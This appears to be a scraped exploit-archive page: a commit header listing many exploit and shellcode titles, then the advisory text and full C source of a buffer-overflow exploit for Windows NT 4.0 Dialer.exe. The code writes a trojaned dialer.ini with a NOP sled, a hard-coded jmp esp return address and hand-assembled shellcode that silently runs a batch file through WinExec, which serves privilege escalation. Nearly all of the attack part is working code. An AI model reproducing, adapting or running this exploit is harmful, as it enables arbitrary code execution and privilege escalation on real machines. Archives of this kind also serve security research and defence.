880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
137 lines
No EOL
4.9 KiB
C
137 lines
No EOL
4.9 KiB
C
// source: https://www.securityfocus.com/bid/554/info
|
|
|
|
Dialer.exe has an unchecked buffer in the part of the program that reads dialer entries from %systemroot%\dialer.ini. A specially-formed entry could cause arbitrary code to be run on the machine. By default, the %systemroot% folder is world-writeable. Dialer.ini is Dialer runs in the security context of the user, so an attacker would have to have a higher authority user dial the entry to gain any escalated priveleges.
|
|
|
|
The following code will create a trojaned dialer.ini file that when read in by dialer will cause it to run a batch file called code.bat - this is hidden from the desktop by calling the equivalent of WinExec("code.bat",0); - and then ExitProcess(0); is called to shutup dialer.exe. Once the dialer.ini has been trojaned the attacker would create a batch file called code.bat and place in there any commands they wished to be run. Needless to say that if a user with admin rights runs dialer any commands placed in this batch file are likely to succeed.
|
|
|
|
#include <stdio.h>
|
|
#include <windows.h>
|
|
|
|
int main(void)
|
|
{
|
|
FILE *fd;
|
|
char ExploitCode[256];
|
|
int count = 0;
|
|
while (count < 100)
|
|
{
|
|
ExploitCode[count]=0x90;
|
|
count ++;
|
|
}
|
|
|
|
// ExploitCode[100] to ExploitCode[103] overwrites the real return address
|
|
// with 0x77F327E5 which contains a "jmp esp" instruction taking us back
|
|
// to our payload of exploit code
|
|
ExploitCode[100]=0xE5;
|
|
ExploitCode[101]=0x27;
|
|
ExploitCode[102]=0xF3;
|
|
ExploitCode[103]=0x77;
|
|
|
|
// procedure prologue - push ebp
|
|
// mov ebp,esp
|
|
ExploitCode[104]=0x55;
|
|
ExploitCode[105]=0x8B;
|
|
|
|
// This moves into the eax register the address where WinExec() is found
|
|
// in kernel32.dll at address 0x77F1A9DA - This address has been hard-
|
|
// coded in to save room rather than going through LoadLibrary() and
|
|
// GetProcAddress () to get the address - since we've already hard
|
|
// coded in the return address from kernel32.dll - there seems no
|
|
// harm in doing this
|
|
ExploitCode[106]=0xEC;
|
|
ExploitCode[107]=0xB8;
|
|
ExploitCode[108]=0xDA;
|
|
ExploitCode[109]=0xA9;
|
|
ExploitCode[110]=0xF1;
|
|
ExploitCode[111]=0x77;
|
|
|
|
// We need some NULLs to terminate a string - to do this we xor the esi
|
|
// register with itself - xor esi,esi
|
|
ExploitCode[112]=0x33;
|
|
ExploitCode[113]=0xF6;
|
|
|
|
// These NULLs are then pushed onto the stack - push esi
|
|
ExploitCode[114]=0x56;
|
|
|
|
// Now the name of the batch file to be run is pushed onto the stack
|
|
// We'll let WinExec() pick up the file - we use push here
|
|
// to push on "tab." (code.bat)
|
|
ExploitCode[115]=0x68;
|
|
ExploitCode[116]=0x2E;
|
|
ExploitCode[117]=0x62;
|
|
ExploitCode[118]=0x61;
|
|
ExploitCode[119]=0x74;
|
|
|
|
// And now we push on "edoc"
|
|
ExploitCode[120]=0x68;
|
|
ExploitCode[121]=0x63;
|
|
ExploitCode[122]=0x6F;
|
|
ExploitCode[123]=0x64;
|
|
ExploitCode[124]=0x65;
|
|
|
|
// We push the esi (our NULLs) again - this will be used by WinExec() to
|
|
determine
|
|
// whether to display a window on the desktop or not - in this case it will
|
|
not
|
|
ExploitCode[125]=0x56;
|
|
|
|
// The address of the "c" of code.bat is loaded into the edi register -
|
|
this
|
|
// becomes a pointer to the name of what we want to tell WinExec() to run
|
|
ExploitCode[126]=0x8D;
|
|
ExploitCode[127]=0x7D;
|
|
ExploitCode[128]=0xF4;
|
|
|
|
// This is then pushed onto the stack
|
|
ExploitCode[129]=0x57;
|
|
|
|
// With everything primed we then call WinExec() - this will then run
|
|
code.bat
|
|
ExploitCode[130]=0xFF;
|
|
ExploitCode[131]=0xD0;
|
|
|
|
// With the batch file running we then call ExitProcess () to stop
|
|
dialer.exe
|
|
// from churning out an Access Violation message - first the procedure
|
|
//prologue push ebp and movebp,esp
|
|
ExploitCode[132]=0x55;
|
|
ExploitCode[133]=0x8B;
|
|
ExploitCode[134]=0xEC;
|
|
|
|
// We need to give ExitProcess() an exit code - we'll give it 0 to use - we
|
|
need
|
|
// some NULLs then - xor esi,esi
|
|
ExploitCode[135]=0x33;
|
|
ExploitCode[136]=0xF6;
|
|
|
|
// and we need them on the stack - push esi
|
|
ExploitCode[137]=0x56;
|
|
|
|
// Now we mov the address for ExitProcess() into the EAX register - again
|
|
we
|
|
// we hard code this in tieing this exploit to NT 4.0 SP4
|
|
ExploitCode[138]=0xB8;
|
|
ExploitCode[139]=0xE6;
|
|
ExploitCode[140]=0x9F;
|
|
ExploitCode[141]=0xF1;
|
|
ExploitCode[142]=0x77;
|
|
|
|
// And then finally call it
|
|
ExploitCode[143]=0xFF;
|
|
ExploitCode[144]=0xD0;
|
|
|
|
// Now to create the trojaned dialer.ini file
|
|
fd = fopen("dialer.ini", "w+");
|
|
if (fd == NULL)
|
|
{
|
|
printf("Couldn't create dialer.ini");
|
|
return 0;
|
|
}
|
|
// Give dialer.exe what it needs from dialer.ini
|
|
fprintf(fd,"[Preference]\nPreferred Line=148446\nPreferred Address=0\nMain
|
|
Window Left/Top=489, 173\n[Last dialed numbers]\nLast dialed 1=");
|
|
|
|
// And inject our exploit code
|
|
fprintf(fd,ExploitCode);
|
|
|
|
fclose(fd);
|
|
} |